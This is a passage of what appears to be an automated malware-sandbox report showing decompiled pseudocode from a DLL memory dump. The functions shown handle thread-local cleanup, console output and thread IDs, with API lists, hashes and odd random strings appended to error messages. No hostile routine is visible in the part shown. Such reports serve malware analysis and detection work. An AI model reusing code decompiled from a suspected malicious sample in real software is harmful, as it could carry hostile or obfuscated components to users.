					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6f28adcc; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6f28adcc; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6f28adcc; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6f287100; // 0x70
					return _t26;
				}
			}




















                          0x6f23c504
                          0x6f23c50b
                          0x6f23c515
                          0x6f23c51d
                          0x00000000
                          0x00000000
                          0x6f23c529
                          0x6f23c537
                          0x6f23c53a
                          0x6f23c53e
                          0x6f23c547
                          0x6f23c54e
                          0x6f23c551
                          0x6f23c554
                          0x6f23c554
                          0x6f23c530
                          0x6f23c533
                          0x6f23c55b
                          0x00000000
                          0x00000000
                          0x6f23c561
                          0x6f23c569
                          0x00000000
                          0x00000000
                          0x6f23c56f
                          0x6f23c587
                          0x6f23c58a
                          0x6f23c58e
                          0x6f23c597
                          0x6f23c59e
                          0x6f23c5a1
                          0x6f23c5a4
                          0x6f23c5a4
                          0x6f23c580
                          0x6f23c583
                          0x6f23c5ab
                          0x00000000
                          0x00000000
                          0x6f23c5b1
                          0x6f23c5b9
                          0x00000000
                          0x00000000
                          0x6f23c5bb
                          0x6f23c5c7
                          0x6f23c5ca
                          0x6f23c5ce
                          0x6f23c5d7
                          0x6f23c5de
                          0x6f23c5e1
                          0x6f23c5e4
                          0x6f23c5e4
                          0x6f23c5c0
                          0x6f23c5c3
                          0x6f23c5eb
                          0x00000000
                          0x00000000
                          0x6f23c5ed
                          0x6f23c5f5
                          0x00000000
                          0x00000000
                          0x6f23c5f7
                          0x6f23c607
                          0x6f23c60a
                          0x6f23c60e
                          0x6f23c617
                          0x6f23c61e
                          0x6f23c621
                          0x6f23c624
                          0x6f23c624
                          0x6f23c600
                          0x6f23c603
                          0x6f23c62b
                          0x6f23c639
                          0x6f23c644
                          0x6f23c64b
                          0x6f23c64f
                          0x6f23c658
                          0x6f23c65f
                          0x6f23c662
                          0x6f23c662
                          0x6f23c641
                          0x6f23c641
                          0x6f23c644
                          0x00000000
                          0x6f23c62d
                          0x6f23c62d
                          0x6f23c62d
                          0x6f23c636
                          0x6f23c636

                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6F23C53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C547
                          • TlsGetValue.KERNEL32(?), ref: 6F23C58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C597
                          • TlsGetValue.KERNEL32(?), ref: 6F23C5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C5D7
                          • TlsGetValue.KERNEL32(?), ref: 6F23C60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C617
                          • TlsGetValue.KERNEL32(?), ref: 6F23C64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C658
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 838b3aae1e949e9f80e02442f5755e9ddfc7073851ae8d6579daab9141024baa
                          • Instruction ID: a9e6e2a5173fb0924c43cc91bc06b0ac407b5ee4636615e7c380b3e51d380edb
                          • Opcode Fuzzy Hash: 838b3aae1e949e9f80e02442f5755e9ddfc7073851ae8d6579daab9141024baa
                          • Instruction Fuzzy Hash: 1A41D5F3AD427DEBDB015F649D04BDA37A4EF42B62F045021EE2059241E761EA21DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F241DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E6F241DA0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6F233820( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6f27cd60; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6f27e0bc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6f27e0f4);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6F233820( &_v48, _t125);
												_t158 =  &(_t158[1]);
												_t86 = E6F2428E0(_t96,  &_v48, _t133, _t135);
												_t97 = _t125;
												L28:
												_push(_t97);
												_push(_t86);
												_t57 = E6F242620(_t97, _t135, _t133, _t133, _t135);
												_t158 =  &(_t158[2]);
												goto L9;
											}
										}
									}
								} else {
									__eflags = _t57 - 4;
									if(_t57 >= 4) {
										E6F2572E0("Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq", 0x3a, 0x6f27e05c);
										_t158 =  &(_t158[1]);
										asm("ud2");
										L42:
										_t61 = E6F256E20(_t96,  &M6F27D3AA, 0x23, _t133, _t135, __eflags, 0x6f27d454);
										_t158 =  &(_t158[1]);
										asm("ud2");
										goto L43;
									} else {
										_t110 =  *_t96;
										_t155 = _a8;
										__eflags = (_t110 & 0x000000c0) - 0x80;
										if((_t110 & 0x000000c0) != 0x80) {
											_a4 = 0;
											goto L24;
										} else {
											_t155[_t57] = _t110;
											_t112 = _a4 + 1;
											_a4 = _t112;
											_t57 =  *_t155 & 0x000000ff;
											_t96 =  *(_t57 + 0x6f27cd60) & 0x000000ff;
											__eflags = _t96 - _t112;
											_v24 = _t96;
											if(_t96 <= _t112) {
												_t61 = _t112 & 0x000000ff;
												__eflags = _t112 - 5;
												if(__eflags >= 0) {
													L43:
													_t100 = _t61;
													_t118 = 4;
													_push(0x6f27e0c4);
													L45:
													E6F256DB0(_t96, _t100, _t118, _t133, _t135, __eflags);
													_t160 =  &(_t158[1]);
													asm("ud2");
													goto L46;
												} else {
													_push(_t61);
													_t57 = E6F233820( &_v60, _t155);
													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6f27e0bc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6f27e0d4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															E6F242620(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6f27e0e4);
																	_push(_t156);
																	L48:
																	E6F2573F0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6f2422a8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}













































                          0x6f241da0
                          0x6f241da1
                          0x6f241da2
                          0x6f241da4
                          0x6f241da7
                          0x6f241dab
                          0x6f241daf
                          0x6f241dce
                          0x00000000
                          0x6f241db1
                          0x6f241db1
                          0x6f241db5
                          0x6f241dbd
                          0x6f241ddd
                          0x00000000
                          0x6f241dbf
                          0x6f241dbf
                          0x6f241dc4
                          0x6f241dfe
                          0x6f241e08
                          0x6f241e0e
                          0x6f241e10
                          0x6f241e69
                          0x6f241e6b
                          0x00000000
                          0x6f241e71
                          0x6f241e71
                          0x6f241e83
                          0x6f241e89
                          0x6f241e8b
                          0x6f241f05
                          0x6f241f0b
                          0x6f241f0b
                          0x6f241f0d
                          0x6f241e8d
                          0x6f241e8d
                          0x6f241e91
                          0x6f241e93
                          0x6f241e93
                          0x6f241f12
                          0x6f241f14
                          0x6f241f17
                          0x00000000
                          0x6f241f17
                          0x6f241e12
                          0x6f241e16
                          0x6f241e1a
                          0x6f241e1c
                          0x6f241e97
                          0x6f241ea8
                          0x6f241eab
                          0x6f241eac
                          0x6f241eb1
                          0x6f241eb4
                          0x6f241eb9
                          0x6f241f1f
                          0x6f241f23
                          0x00000000
                          0x6f241ebb
                          0x6f241ebb
                          0x6f241ec0
                          0x6f241f99
                          0x6f241f9c
                          0x6f241f9c
                          0x6f241fa3
                          0x6f241fa6
                          0x6f241fdb
                          0x6f241fdb
                          0x6f241fe2
                          0x00000000
                          0x6f241fa8
                          0x6f241fa8
                          0x6f241faa
                          0x00000000
                          0x6f241fac
                          0x6f241fac
                          0x6f241fb0
                          0x6f241fb2
                          0x00000000
                          0x6f241fb2
                          0x6f241faa
                          0x00000000
                          0x6f241ec6
                          0x6f241ec6
                          0x6f241eca
                          0x6f241ecc
                          0x6f242035
                          0x6f242037
                          0x6f242039
                          0x00000000
                          0x6f241ed2
                          0x6f241ed6
                          0x6f241eda
                          0x6f241edb
                          0x6f241ee0
                          0x6f241ee5
                          0x6f241eea
                          0x6f241f27
                          0x6f241f2b
                          0x6f241f2c
                          0x6f241f2d
                          0x6f241f32
                          0x00000000
                          0x6f241f32
                          0x6f241ecc
                          0x6f241ec0
                          0x6f241e1e
                          0x6f241e1e
                          0x6f241e20
                          0x6f242004
                          0x6f242009
                          0x6f24200c
                          0x6f24200e
                          0x6f24201d
                          0x6f242022
                          0x6f242025
                          0x00000000
                          0x6f241e26
                          0x6f241e26
                          0x6f241e28
                          0x6f241e31
                          0x6f241e34
                          0x6f241eee
                          0x00000000
                          0x6f241e3a
                          0x6f241e3a
                          0x6f241e41
                          0x6f241e43
                          0x6f241e46
                          0x6f241e4a
                          0x6f241e51
                          0x6f241e53
                          0x6f241e57
                          0x6f241f3a
                          0x6f241f3d
                          0x6f241f40
                          0x6f242027
                          0x6f242027
                          0x6f242029
                          0x6f24202e
                          0x6f24203e
                          0x6f24203e
                          0x6f242043
                          0x6f242046
                          0x00000000
                          0x6f241f46
                          0x6f241f4c
                          0x6f241f4d
                          0x6f241f52
                          0x6f241f55
                          0x6f241f5a
                          0x6f241f5e
                          0x6f241ef2
                          0x6f241ef2
                          0x6f241ef9
                          0x00000000
                          0x6f241f60
                          0x6f241f60
                          0x6f241f64
                          0x6f241f68
                          0x6f241f6a
                          0x6f241f6d
                          0x6f242048
                          0x6f242048
                          0x6f24204c
                          0x6f24204e
                          0x6f242056
                          0x6f24205f
                          0x00000000
                          0x6f241f73
                          0x6f241f73
                          0x6f241f7b
                          0x6f241f7c
                          0x6f241f7d
                          0x6f241f82
                          0x6f241f85
                          0x6f241f8a
                          0x6f241fb8
                          0x6f241fbc
                          0x6f241fbf
                          0x6f241fc1
                          0x6f241fc5
                          0x6f242062
                          0x6f242066
                          0x6f242068
                          0x6f242070
                          0x6f242075
                          0x6f242076
                          0x6f242076
                          0x6f24207e
                          0x6f242081
                          0x6f242086
                          0x6f242089
                          0x6f24208f
                          0x6f2420b5
                          0x6f2420bb
                          0x6f2420d9
                          0x6f2420df
                          0x6f242152
                          0x6f242158
                          0x6f24220e
                          0x6f242214
                          0x00000000
                          0x6f242216
                          0x6f242216
                          0x6f24221c
                          0x00000000
                          0x6f24221e
                          0x6f24221e
                          0x6f242224
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f242224
                          0x6f24221c
                          0x6f24215e
                          0x6f24215e
                          0x6f242164
                          0x00000000
                          0x6f24216a
                          0x6f24216a
                          0x6f242170
                          0x00000000
                          0x6f242176
                          0x6f242176
                          0x6f24217c
                          0x00000000
                          0x6f242182
                          0x00000000
                          0x6f242182
                          0x6f24217c
                          0x6f242170
                          0x6f242164
                          0x6f2420e1
                          0x6f2420e1
                          0x6f2420e7
                          0x6f2421d0
                          0x6f2421d6
                          0x6f242251
                          0x6f2421d8
                          0x6f2421d8
                          0x6f2421de
                          0x6f2422a1
                          0x6f2421e4
                          0x6f2421e4
                          0x6f2421ea
                          0x00000000
                          0x6f2421ec
                          0x00000000
                          0x6f2421ec
                          0x6f2421ea
                          0x6f2421de
                          0x6f2420ed
                          0x6f2420ed
                          0x6f2420f3
                          0x6f24228d
                          0x6f2420f9
                          0x6f2420f9
                          0x6f2420ff
                          0x6f242291
                          0x6f242105
                          0x6f242105
                          0x6f24210b
                          0x00000000
                          0x6f242111
                          0x6f242114
                          0x6f242114
                          0x6f24210b
                          0x6f2420ff
                          0x6f2420f3
                          0x6f2420e7
                          0x6f2420bd
                          0x6f2420bd
                          0x6f2420c3
                          0x6f2420c6
                          0x6f2420d3
                          0x6f2420d3
                          0x6f2421be
                          0x6f2421c1
                          0x00000000
                          0x6f2421c3
                          0x6f2421c3
                          0x6f2421c9
                          0x00000000
                          0x6f2421cb
                          0x00000000
                          0x6f2421cb
                          0x6f2421c9
                          0x6f2421c1
                          0x6f242091
                          0x6f242091
                          0x6f242097
                          0x6f242115
                          0x6f24211b
                          0x6f242187
                          0x6f24218d
                          0x6f242232
                          0x6f242238
                          0x6f242249
                          0x6f24223a
                          0x6f24223a
                          0x6f242240
                          0x00000000
                          0x6f242242
                          0x6f242245
                          0x6f242245
                          0x6f242240
                          0x6f242193
                          0x6f242193
                          0x6f242199
                          0x6f24229d
                          0x6f24219f
                          0x6f24219f
                          0x6f2421a5
                          0x6f24224d
                          0x6f2421ab
                          0x6f2421ab
                          0x6f2421b1
                          0x00000000
                          0x6f2421b3
                          0x00000000
                          0x6f2421b3
                          0x6f2421b1
                          0x6f2421a5
                          0x6f242199
                          0x6f24211d
                          0x6f24211d
                          0x6f242123
                          0x6f2421f1
                          0x6f2421f7
                          0x00000000
                          0x6f2421f9
                          0x6f2421f9
                          0x6f2421ff
                          0x00000000
                          0x6f242201
                          0x6f242201
                          0x6f242207
                          0x00000000
                          0x6f242209
                          0x00000000
                          0x6f242209
                          0x6f242207
                          0x6f2421ff
                          0x6f242129
                          0x6f242129
                          0x6f24212f
                          0x6f242295
                          0x6f242135
                          0x6f242135
                          0x6f24213b
                          0x6f242299
                          0x6f242141
                          0x6f242141
                          0x6f242147
                          0x6f242226
                          0x6f242229
                          0x6f24214d
                          0x00000000
                          0x6f24214d
                          0x6f242147
                          0x6f24213b
                          0x6f24212f
                          0x6f242123
                          0x6f242099
                          0x6f242099
                          0x6f24209c
                          0x6f2420a2
                          0x6f2420a8
                          0x6f2420af
                          0x6f2420af
                          0x6f2422a2
                          0x6f2422a5
                          0x6f2422a5
                          0x6f242097
                          0x6f241fcb
                          0x6f241fcb
                          0x6f241fcb
                          0x6f241fcd
                          0x6f241fd4
                          0x00000000
                          0x6f241fd4
                          0x6f241f8c
                          0x6f241f8c
                          0x6f241f92
                          0x6f241fe9
                          0x6f241fe9
                          0x6f241fee
                          0x00000000
                          0x6f241fee
                          0x6f241f8a
                          0x6f241f6d
                          0x6f241f5e
                          0x6f241e5d
                          0x6f241e5d
                          0x6f241dd5
                          0x6f241dd5
                          0x00000000
                          0x6f241dd5
                          0x6f241e57
                          0x6f241e34
                          0x6f241e20
                          0x6f241e1c
                          0x6f241dc6
                          0x6f241dc6
                          0x6f241de2
                          0x6f241de2
                          0x6f241de9
                          0x6f241dec
                          0x6f241dec
                          0x6f241df2
                          0x6f241df9
                          0x6f241df9
                          0x6f241dc4
                          0x6f241dbd

                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6F241C2E,?), ref: 6F241DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6F241C2E,?), ref: 6F241DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6F241E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F241E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6F241F05
                          Strings
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6F24200E
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6F241FF5
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 362033da315a8bf6132f75adc044a5959476cb9e5aa3d0e9b4f8ab7f1159d6d6
                          • Instruction ID: cc2fcc02ae6876e1fdc8429cb3912d84218604be3f9609906328b5818a37534c
                          • Opcode Fuzzy Hash: 362033da315a8bf6132f75adc044a5959476cb9e5aa3d0e9b4f8ab7f1159d6d6
                          • Instruction Fuzzy Hash: 1F7113B06087499FD7198F25C84075B7BE5EB86305F00882DE4968B3C0D7B5E999CF23
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E6F23C690(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6F243B40;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6f28ada8, __esi, __edi, __ebx);
				_t47 =  *0x6f28a038; // 0x1
				_t50 =  *0x6f28a03c; // 0x0
				_v40 = 0x6f28ada8;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6f28ada8);
					_v20 = 0;
					_t22 = E6F2572E0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6f27d270);
					goto L10;
				} else {
					 *0x6f28a038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6f28a03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6F256E20(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6f27d280);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6F23C870(_t22,  &_v40);
						}
						return E6F23C850( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6f28ada8);
						_t29 =  *0x6f28adc8;
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6F256C30(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6f28adc8 = _t29;
								goto L5;
							}
						}
					}
				}
			}


















                          0x6f23c690
                          0x6f23c699
                          0x6f23c69c
                          0x6f23c6a3
                          0x6f23c6b4
                          0x6f23c6b7
                          0x6f23c6bd
                          0x6f23c6c9
                          0x6f23c6cf
                          0x6f23c6d5
                          0x6f23c6db
                          0x6f23c6e4
                          0x6f23c6e9
                          0x6f23c77f
                          0x6f23c77f
                          0x6f23c787
                          0x6f23c78d
                          0x6f23c7a3
                          0x00000000
                          0x6f23c6ef
                          0x6f23c6f6
                          0x6f23c6fd
